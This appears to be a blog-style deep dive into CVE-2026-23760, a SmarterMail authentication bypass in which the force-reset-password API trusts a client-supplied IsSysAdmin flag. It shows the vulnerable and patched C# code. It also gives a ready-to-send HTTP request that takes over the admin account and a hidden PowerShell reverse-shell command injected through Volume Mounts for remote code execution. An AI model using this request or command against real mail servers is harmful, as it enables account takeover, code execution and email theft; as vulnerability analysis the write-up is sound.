SmarterMail, Dumber Auth: The CVE-2026-23760 Deep Dive

SmarterMail by SmarterTools is one of those ubiquitous pieces of software that quietly powers the internet's underbelly. It's an Exchange alternative for Windows and Linux, popular among MSPs and mid-sized businesses who look at Microsoft's licensing fees and say, "No thanks."

Because it handles email, it sits on the perimeter, usually exposing ports 80, 443, and its management interface (default 9998) to the entire world. It holds the keys to the kingdom: password resets, confidential communications, and 2FA tokens.

In January 2026, researchers found that this digital fortress had left the back door not just unlocked, but wide open with a neon sign pointing to it. CVE-2026-23760 isn't a complex memory corruption bug; it's a logic flaw so fundamental it hurts.

The vulnerability resides in the force-reset-password API endpoint. Ideally, a password reset function should require one of two things: the old password (to prove you are who you say you are) or a secure token (to prove you have access to the recovery email).

SmarterMail implemented these checks for normal users. However, for system administrators, the developers took a shortcut. The API accepts a JSON payload containing a boolean flag called IsSysAdmin.

Here is the logic flaw in plain English: If the request says IsSysAdmin: true, the code assumes the caller is authorized to perform the reset. It skips the "Old Password" check entirely. It's the digital equivalent of walking into a bank vault while wearing a t-shirt that says "I work here," and the security guards just waving you through.

Let's look at the decompiled C# code from the AuthenticationController. This is where the magic happens—or rather, where the tragedy unfolds.

The Vulnerable Code (Pre-Build 9511):

public new ResetPasswordResult ForcePasswordReset(ForceResetPasswordInputs inputs, string hostname)
{
    // ... setup code ...
 
    // CRITICAL FLAW: Trusting user input blindly
    if (inputs.IsSysAdmin)
    {
        // Retrieve the admin account by username (provided by attacker)
        var admin = SystemRepository.Instance.AdministratorGetByUsername(inputs.Username);
        
        // Create an update object with the NEW password (provided by attacker)
        var item = new db_system_administrator
        {
            guid = admin.guid,
            Password = inputs.NewPassword,
            password_history_hashed = dictionary
        };
 
        // Commit to database without verifying OldPassword or Token!
        SystemRepository.Instance.AdministratorUpdate(item, ...);
    }
    // ...
}

See that empty space before AdministratorUpdate? That's where the security check should be. The code implicitly trusts that if you claim to be doing a SysAdmin reset, you must know what you're doing.

The Fix (Build 9511):

The patch is a single if statement that validates the OldPassword even for admins.

if (inputs.IsSysAdmin)
{
    // THE FIX: Validate the existing credentials first
    if (!db_system_administrator_readonly.ValidatePassword(inputs.OldPassword, null)) 
    {
        return new ResetPasswordResult 
        {
            Success = false, 
            Message = "Invalid input parameters"
        };
    }
    // ... proceed to update ...
}

Exploiting this is trivially easy. You don't need shellcode, you don't need heap spraying. You just need curl.

Step 1: The Takeover

Send a POST request to the API. We set IsSysAdmin to true and provide the default administrator username (admin). We can put garbage in OldPassword because the server ignores it.

POST /api/v1/auth/force-reset-password HTTP/1.1
Host: target-mail-server:9998
Content-Type: application/json
 
{
  "IsSysAdmin": "true",
  "OldPassword": "ignored_garbage",
  "Username": "admin",
  "NewPassword": "Hacked!123",
  "ConfirmPassword": "Hacked!123"
}

If successful, the server responds with 200 OK and a debug string containing check8.2. Congratulations, you are now the admin.

Step 2: The Execution (RCE)

SmarterMail has a feature called "Volume Mounts" that allows admins to map drives. Historically, mail server admins often need to execute scripts. SmarterMail allows this via the interface.

An attacker simply logs in with the new password, navigates to Settings -> Volume Mounts, and configures a new mount point. In the command field, they inject an OS command:

cmd.exe /c powershell -nop -w hidden -e <base64_reverse_shell>

Upon saving, the service executes this command as NT AUTHORITY\SYSTEM on Windows or root on Linux. Game over.

The impact here cannot be overstated. We are talking about unauthenticated Remote Code Execution (RCE) on an email server.

1. Data Exfiltration: The attacker can read every email sent or received by the organization. Corporate espionage gold.
2. Pivot Point: Mail servers are often trusted by other internal systems. This is the perfect beachhead for lateral movement into the domain controller.
3. Ransomware: It is already confirmed that ransomware groups are using this CVE to encrypt mail stores.

CISA added this to their KEV catalog just days after the exploit went public. If you see this open on the internet, it is likely already compromised.